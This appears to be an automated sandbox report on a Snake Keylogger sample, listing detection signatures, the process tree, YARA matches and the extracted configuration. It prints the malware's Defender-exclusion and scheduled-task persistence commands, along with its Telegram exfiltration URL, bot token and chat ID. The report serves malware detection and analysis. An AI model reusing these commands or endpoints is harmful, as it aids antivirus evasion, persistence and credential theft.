Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1574874
MD5:	30e5e5a39df67a1138bf84db89a5eb47
SHA1:	d269595a30fd1e49086c51f629e39c15200e0149
SHA256:	1d409e94b935c68a4b4841a1b2e05c6abf1ea827c419eab8bf3ee23229574160
Tags:	NETexeMSILuser-jstrosch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 30E5E5A39DF67A1138BF84DB89A5EB47)

powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rXcourOVPD.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8048 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

file.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 30E5E5A39DF67A1138BF84DB89A5EB47)

rXcourOVPD.exe (PID: 6576 cmdline: C:\Users\user\AppData\Roaming\rXcourOVPD.exe MD5: 30E5E5A39DF67A1138BF84DB89A5EB47)

schtasks.exe (PID: 7200 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmpAA33.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rXcourOVPD.exe (PID: 3728 cmdline: "C:\Users\user\AppData\Roaming\rXcourOVPD.exe" MD5: 30E5E5A39DF67A1138BF84DB89A5EB47)

rXcourOVPD.exe (PID: 5492 cmdline: "C:\Users\user\AppData\Roaming\rXcourOVPD.exe" MD5: 30E5E5A39DF67A1138BF84DB89A5EB47)

rXcourOVPD.exe (PID: 6976 cmdline: "C:\Users\user\AppData\Roaming\rXcourOVPD.exe" MD5: 30E5E5A39DF67A1138BF84DB89A5EB47)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7329625827:AAFusOMtNxAA4AfTt7YzeN1zaE4Sm-WxFiw/sendMessage?chat_id=8096159140", "Token": "7329625827:AAFusOMtNxAA4AfTt7YzeN1zaE4Sm-WxFiw", "Chat_id": "8096159140", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000002.3762642230.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x132be:$a1: get_encryptedPassword 0x135a2:$a2: get_encryptedUsername 0x130ca:$a3: get_timePasswordChanged 0x131c5:$a4: get_passwordField 0x132d4:$a5: set_encryptedPassword 0x14937:$a7: get_logins 0x1489a:$a10: KeyLoggerEventArgs 0x14505:$a11: KeyLoggerEventArgsEventHandler
0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18260:$x1: $%SMTPDV$ 0x16c44:$x2: $#TheHashHere%& 0x18208:$x3: %FTPDV$ 0x16be4:$x4: $%TelegramDv$ 0x14505:$x5: KeyLoggerEventArgs 0x1489a:$x5: KeyLoggerEventArgs 0x1822c:$m2: Clipboard Logs ID 0x1846a:$m2: Screenshot Logs ID 0x1857a:$m2: keystroke Logs ID 0x18854:$m3: SnakePW 0x18442:$m4: \SnakeKeylogger\
0000000E.00000002.3761812258.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14d5e:$a1: get_encryptedPassword 0x34d7e:$a1: get_encryptedPassword 0x54b9e:$a1: get_encryptedPassword 0x15042:$a2: get_encryptedUsername 0x35062:$a2: get_encryptedUsername 0x54e82:$a2: get_encryptedUsername 0x14b6a:$a3: get_timePasswordChanged 0x34b8a:$a3: get_timePasswordChanged 0x549aa:$a3: get_timePasswordChanged 0x14c65:$a4: get_passwordField 0x34c85:$a4: get_passwordField 0x54aa5:$a4: get_passwordField 0x14d74:$a5: set_encryptedPassword 0x34d94:$a5: set_encryptedPassword 0x54bb4:$a5: set_encryptedPassword 0x163d7:$a7: get_logins 0x363f7:$a7: get_logins 0x56217:$a7: get_logins 0x1633a:$a10: KeyLoggerEventArgs 0x3635a:$a10: KeyLoggerEventArgs 0x5617a:$a10: KeyLoggerEventArgs
0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19d00:$x1: $%SMTPDV$ 0x39d20:$x1: $%SMTPDV$ 0x59b40:$x1: $%SMTPDV$ 0x186e4:$x2: $#TheHashHere%& 0x38704:$x2: $#TheHashHere%& 0x58524:$x2: $#TheHashHere%& 0x19ca8:$x3: %FTPDV$ 0x39cc8:$x3: %FTPDV$ 0x59ae8:$x3: %FTPDV$ 0x18684:$x4: $%TelegramDv$ 0x386a4:$x4: $%TelegramDv$ 0x584c4:$x4: $%TelegramDv$ 0x15fa5:$x5: KeyLoggerEventArgs 0x1633a:$x5: KeyLoggerEventArgs 0x35fc5:$x5: KeyLoggerEventArgs 0x3635a:$x5: KeyLoggerEventArgs 0x55de5:$x5: KeyLoggerEventArgs 0x5617a:$x5: KeyLoggerEventArgs 0x19ccc:$m2: Clipboard Logs ID 0x19f0a:$m2: Screenshot Logs ID 0x1a01a:$m2: keystroke Logs ID
00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14c5e:$a1: get_encryptedPassword 0x34c7e:$a1: get_encryptedPassword 0x54a9e:$a1: get_encryptedPassword 0x14f42:$a2: get_encryptedUsername 0x34f62:$a2: get_encryptedUsername 0x54d82:$a2: get_encryptedUsername 0x14a6a:$a3: get_timePasswordChanged 0x34a8a:$a3: get_timePasswordChanged 0x548aa:$a3: get_timePasswordChanged 0x14b65:$a4: get_passwordField 0x34b85:$a4: get_passwordField 0x549a5:$a4: get_passwordField 0x14c74:$a5: set_encryptedPassword 0x34c94:$a5: set_encryptedPassword 0x54ab4:$a5: set_encryptedPassword 0x162d7:$a7: get_logins 0x362f7:$a7: get_logins 0x56117:$a7: get_logins 0x1623a:$a10: KeyLoggerEventArgs 0x3625a:$a10: KeyLoggerEventArgs 0x5607a:$a10: KeyLoggerEventArgs
00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19c00:$x1: $%SMTPDV$ 0x39c20:$x1: $%SMTPDV$ 0x59a40:$x1: $%SMTPDV$ 0x185e4:$x2: $#TheHashHere%& 0x38604:$x2: $#TheHashHere%& 0x58424:$x2: $#TheHashHere%& 0x19ba8:$x3: %FTPDV$ 0x39bc8:$x3: %FTPDV$ 0x599e8:$x3: %FTPDV$ 0x18584:$x4: $%TelegramDv$ 0x385a4:$x4: $%TelegramDv$ 0x583c4:$x4: $%TelegramDv$ 0x15ea5:$x5: KeyLoggerEventArgs 0x1623a:$x5: KeyLoggerEventArgs 0x35ec5:$x5: KeyLoggerEventArgs 0x3625a:$x5: KeyLoggerEventArgs 0x55ce5:$x5: KeyLoggerEventArgs 0x5607a:$x5: KeyLoggerEventArgs 0x19bcc:$m2: Clipboard Logs ID 0x19e0a:$m2: Screenshot Logs ID 0x19f1a:$m2: keystroke Logs ID
00000014.00000002.3762642230.0000000002A91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3761812258.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: file.exe PID: 7544	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 7544	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: file.exe PID: 7544	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35792:$a1: get_encryptedPassword 0x35a6c:$a2: get_encryptedUsername 0x355a8:$a3: get_timePasswordChanged 0x356a3:$a4: get_passwordField 0x357a8:$a5: set_encryptedPassword 0x37c56:$a7: get_logins 0x37bb9:$a10: KeyLoggerEventArgs 0x37824:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: file.exe PID: 7544	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x37824:$x5: KeyLoggerEventArgs 0x37bb9:$x5: KeyLoggerEventArgs 0x384c0:$x5: KeyLoggerEventArgs 0x38821:$x5: KeyLoggerEventArgs 0x39de5:$m2: Clipboard Logs ID 0x39eeb:$m2: Screenshot Logs ID 0x39f41:$m2: keystroke Logs ID 0x3a076:$m3: SnakePW 0x39ed7:$m4: \SnakeKeylogger\
Process Memory Space: file.exe PID: 6176	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: file.exe PID: 6176	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x39d9b:$a1: get_encryptedPassword 0x3a075:$a2: get_encryptedUsername 0x39bb1:$a3: get_timePasswordChanged 0x39cac:$a4: get_passwordField 0x39db1:$a5: set_encryptedPassword 0x3c25f:$a7: get_logins 0x3c1c2:$a10: KeyLoggerEventArgs 0x3be2d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: file.exe PID: 6176	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3be2d:$x5: KeyLoggerEventArgs 0x3c1c2:$x5: KeyLoggerEventArgs 0x3cac9:$x5: KeyLoggerEventArgs 0x3ce2a:$x5: KeyLoggerEventArgs 0x3e3ee:$m2: Clipboard Logs ID 0x3e4f4:$m2: Screenshot Logs ID 0x3e54a:$m2: keystroke Logs ID 0x3e67f:$m3: SnakePW 0x3e4e0:$m4: \SnakeKeylogger\
Process Memory Space: rXcourOVPD.exe PID: 6576	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: rXcourOVPD.exe PID: 6576	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rXcourOVPD.exe PID: 6576	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x39904:$a1: get_encryptedPassword 0x39bde:$a2: get_encryptedUsername 0x3971a:$a3: get_timePasswordChanged 0x39815:$a4: get_passwordField 0x3991a:$a5: set_encryptedPassword 0x3bdc8:$a7: get_logins 0x3bd2b:$a10: KeyLoggerEventArgs 0x3b996:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: rXcourOVPD.exe PID: 6576	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3b996:$x5: KeyLoggerEventArgs 0x3bd2b:$x5: KeyLoggerEventArgs 0x3c632:$x5: KeyLoggerEventArgs 0x3c993:$x5: KeyLoggerEventArgs 0x3df57:$m2: Clipboard Logs ID 0x3e05d:$m2: Screenshot Logs ID 0x3e0b3:$m2: keystroke Logs ID 0x3e1e8:$m3: SnakePW 0x3e049:$m4: \SnakeKeylogger\
Process Memory Space: rXcourOVPD.exe PID: 6976	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.2.rXcourOVPD.exe.3c228c0.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.rXcourOVPD.exe.3c228c0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x126be:$a1: get_encryptedPassword 0x129a2:$a2: get_encryptedUsername 0x124ca:$a3: get_timePasswordChanged 0x125c5:$a4: get_passwordField 0x126d4:$a5: set_encryptedPassword 0x13d37:$a7: get_logins 0x13c9a:$a10: KeyLoggerEventArgs 0x13905:$a11: KeyLoggerEventArgsEventHandler
15.2.rXcourOVPD.exe.3c228c0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a016:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19248:$a3: \Google\Chrome\User Data\Default\Login Data 0x1967b:$a4: \Orbitum\User Data\Default\Login Data 0x1a6ba:$a5: \Kometa\User Data\Default\Login Data
15.2.rXcourOVPD.exe.3c228c0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13293:$s1: UnHook 0x1329a:$s2: SetHook 0x132a2:$s3: CallNextHook 0x132af:$s4: _hook
15.2.rXcourOVPD.exe.3c228c0.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17660:$x1: $%SMTPDV$ 0x16044:$x2: $#TheHashHere%& 0x17608:$x3: %FTPDV$ 0x15fe4:$x4: $%TelegramDv$ 0x13905:$x5: KeyLoggerEventArgs 0x13c9a:$x5: KeyLoggerEventArgs 0x1762c:$m2: Clipboard Logs ID 0x1786a:$m2: Screenshot Logs ID 0x1797a:$m2: keystroke Logs ID 0x17c54:$m3: SnakePW 0x17842:$m4: \SnakeKeylogger\
4.2.file.exe.38117c0.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.file.exe.38117c0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x126be:$a1: get_encryptedPassword 0x129a2:$a2: get_encryptedUsername 0x124ca:$a3: get_timePasswordChanged 0x125c5:$a4: get_passwordField 0x126d4:$a5: set_encryptedPassword 0x13d37:$a7: get_logins 0x13c9a:$a10: KeyLoggerEventArgs 0x13905:$a11: KeyLoggerEventArgsEventHandler
4.2.file.exe.38117c0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a016:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19248:$a3: \Google\Chrome\User Data\Default\Login Data 0x1967b:$a4: \Orbitum\User Data\Default\Login Data 0x1a6ba:$a5: \Kometa\User Data\Default\Login Data
4.2.file.exe.38117c0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13293:$s1: UnHook 0x1329a:$s2: SetHook 0x132a2:$s3: CallNextHook 0x132af:$s4: _hook
4.2.file.exe.38117c0.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17660:$x1: $%SMTPDV$ 0x16044:$x2: $#TheHashHere%& 0x17608:$x3: %FTPDV$ 0x15fe4:$x4: $%TelegramDv$ 0x13905:$x5: KeyLoggerEventArgs 0x13c9a:$x5: KeyLoggerEventArgs 0x1762c:$m2: Clipboard Logs ID 0x1786a:$m2: Screenshot Logs ID 0x1797a:$m2: keystroke Logs ID 0x17c54:$m3: SnakePW 0x17842:$m4: \SnakeKeylogger\
15.2.rXcourOVPD.exe.3c028a0.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.file.exe.37f17a0.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.file.exe.37f17a0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x126be:$a1: get_encryptedPassword 0x129a2:$a2: get_encryptedUsername 0x124ca:$a3: get_timePasswordChanged 0x125c5:$a4: get_passwordField 0x126d4:$a5: set_encryptedPassword 0x13d37:$a7: get_logins 0x13c9a:$a10: KeyLoggerEventArgs 0x13905:$a11: KeyLoggerEventArgsEventHandler
15.2.rXcourOVPD.exe.3c028a0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x126be:$a1: get_encryptedPassword 0x129a2:$a2: get_encryptedUsername 0x124ca:$a3: get_timePasswordChanged 0x125c5:$a4: get_passwordField 0x126d4:$a5: set_encryptedPassword 0x13d37:$a7: get_logins 0x13c9a:$a10: KeyLoggerEventArgs 0x13905:$a11: KeyLoggerEventArgsEventHandler
4.2.file.exe.37f17a0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a016:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19248:$a3: \Google\Chrome\User Data\Default\Login Data 0x1967b:$a4: \Orbitum\User Data\Default\Login Data 0x1a6ba:$a5: \Kometa\User Data\Default\Login Data
15.2.rXcourOVPD.exe.3c028a0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a016:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19248:$a3: \Google\Chrome\User Data\Default\Login Data 0x1967b:$a4: \Orbitum\User Data\Default\Login Data 0x1a6ba:$a5: \Kometa\User Data\Default\Login Data
4.2.file.exe.37f17a0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13293:$s1: UnHook 0x1329a:$s2: SetHook 0x132a2:$s3: CallNextHook 0x132af:$s4: _hook
4.2.file.exe.37f17a0.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17660:$x1: $%SMTPDV$ 0x16044:$x2: $#TheHashHere%& 0x17608:$x3: %FTPDV$ 0x15fe4:$x4: $%TelegramDv$ 0x13905:$x5: KeyLoggerEventArgs 0x13c9a:$x5: KeyLoggerEventArgs 0x1762c:$m2: Clipboard Logs ID 0x1786a:$m2: Screenshot Logs ID 0x1797a:$m2: keystroke Logs ID 0x17c54:$m3: SnakePW 0x17842:$m4: \SnakeKeylogger\
15.2.rXcourOVPD.exe.3c028a0.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13293:$s1: UnHook 0x1329a:$s2: SetHook 0x132a2:$s3: CallNextHook 0x132af:$s4: _hook
15.2.rXcourOVPD.exe.3c028a0.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17660:$x1: $%SMTPDV$ 0x16044:$x2: $#TheHashHere%& 0x17608:$x3: %FTPDV$ 0x15fe4:$x4: $%TelegramDv$ 0x13905:$x5: KeyLoggerEventArgs 0x13c9a:$x5: KeyLoggerEventArgs 0x1762c:$m2: Clipboard Logs ID 0x1786a:$m2: Screenshot Logs ID 0x1797a:$m2: keystroke Logs ID 0x17c54:$m3: SnakePW 0x17842:$m4: \SnakeKeylogger\
14.2.file.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.file.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
14.2.file.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144be:$a1: get_encryptedPassword 0x147a2:$a2: get_encryptedUsername 0x142ca:$a3: get_timePasswordChanged 0x143c5:$a4: get_passwordField 0x144d4:$a5: set_encryptedPassword 0x15b37:$a7: get_logins 0x15a9a:$a10: KeyLoggerEventArgs 0x15705:$a11: KeyLoggerEventArgsEventHandler
15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.file.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be16:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b048:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b47b:$a4: \Orbitum\User Data\Default\Login Data 0x1c4ba:$a5: \Kometa\User Data\Default\Login Data
15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144be:$a1: get_encryptedPassword 0x342de:$a1: get_encryptedPassword 0x147a2:$a2: get_encryptedUsername 0x345c2:$a2: get_encryptedUsername 0x142ca:$a3: get_timePasswordChanged 0x340ea:$a3: get_timePasswordChanged 0x143c5:$a4: get_passwordField 0x341e5:$a4: get_passwordField 0x144d4:$a5: set_encryptedPassword 0x342f4:$a5: set_encryptedPassword 0x15b37:$a7: get_logins 0x35957:$a7: get_logins 0x15a9a:$a10: KeyLoggerEventArgs 0x358ba:$a10: KeyLoggerEventArgs 0x15705:$a11: KeyLoggerEventArgsEventHandler 0x35525:$a11: KeyLoggerEventArgsEventHandler
15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1be16:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bc36:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b048:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae68:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b47b:$a4: \Orbitum\User Data\Default\Login Data 0x3b29b:$a4: \Orbitum\User Data\Default\Login Data 0x1c4ba:$a5: \Kometa\User Data\Default\Login Data 0x3c2da:$a5: \Kometa\User Data\Default\Login Data
15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15093:$s1: UnHook 0x34eb3:$s1: UnHook 0x1509a:$s2: SetHook 0x34eba:$s2: SetHook 0x150a2:$s3: CallNextHook 0x34ec2:$s3: CallNextHook 0x150af:$s4: _hook 0x34ecf:$s4: _hook
15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19460:$x1: $%SMTPDV$ 0x39280:$x1: $%SMTPDV$ 0x17e44:$x2: $#TheHashHere%& 0x37c64:$x2: $#TheHashHere%& 0x19408:$x3: %FTPDV$ 0x39228:$x3: %FTPDV$ 0x17de4:$x4: $%TelegramDv$ 0x37c04:$x4: $%TelegramDv$ 0x15705:$x5: KeyLoggerEventArgs 0x15a9a:$x5: KeyLoggerEventArgs 0x35525:$x5: KeyLoggerEventArgs 0x358ba:$x5: KeyLoggerEventArgs 0x1942c:$m2: Clipboard Logs ID 0x1966a:$m2: Screenshot Logs ID 0x1977a:$m2: keystroke Logs ID 0x3924c:$m2: Clipboard Logs ID 0x3948a:$m2: Screenshot Logs ID 0x3959a:$m2: keystroke Logs ID 0x19a54:$m3: SnakePW 0x39874:$m3: SnakePW 0x19642:$m4: \SnakeKeylogger\
14.2.file.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15093:$s1: UnHook 0x1509a:$s2: SetHook 0x150a2:$s3: CallNextHook 0x150af:$s4: _hook
14.2.file.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19460:$x1: $%SMTPDV$ 0x17e44:$x2: $#TheHashHere%& 0x19408:$x3: %FTPDV$ 0x17de4:$x4: $%TelegramDv$ 0x15705:$x5: KeyLoggerEventArgs 0x15a9a:$x5: KeyLoggerEventArgs 0x1942c:$m2: Clipboard Logs ID 0x1966a:$m2: Screenshot Logs ID 0x1977a:$m2: keystroke Logs ID 0x19a54:$m3: SnakePW 0x19642:$m4: \SnakeKeylogger\
15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x144be:$a1: get_encryptedPassword 0x344de:$a1: get_encryptedPassword 0x542fe:$a1: get_encryptedPassword 0x147a2:$a2: get_encryptedUsername 0x347c2:$a2: get_encryptedUsername 0x545e2:$a2: get_encryptedUsername 0x142ca:$a3: get_timePasswordChanged 0x342ea:$a3: get_timePasswordChanged 0x5410a:$a3: get_timePasswordChanged 0x143c5:$a4: get_passwordField 0x343e5:$a4: get_passwordField 0x54205:$a4: get_passwordField 0x144d4:$a5: set_encryptedPassword 0x344f4:$a5: set_encryptedPassword 0x54314:$a5: set_encryptedPassword 0x15b37:$a7: get_logins 0x35b57:$a7: get_logins 0x55977:$a7: get_logins 0x15a9a:$a10: KeyLoggerEventArgs 0x35aba:$a10: KeyLoggerEventArgs 0x558da:$a10: KeyLoggerEventArgs
